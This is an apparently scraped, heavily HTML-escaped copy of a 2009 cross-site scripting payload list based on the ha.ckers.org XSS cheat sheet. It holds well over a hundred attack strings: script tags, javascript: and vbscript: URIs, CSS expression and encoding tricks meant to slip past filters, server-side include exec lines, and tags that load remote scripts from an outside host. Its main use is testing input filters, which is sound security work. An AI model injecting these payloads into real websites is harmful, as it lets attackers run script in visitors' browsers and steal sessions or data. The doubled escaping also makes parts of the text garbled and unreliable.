\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
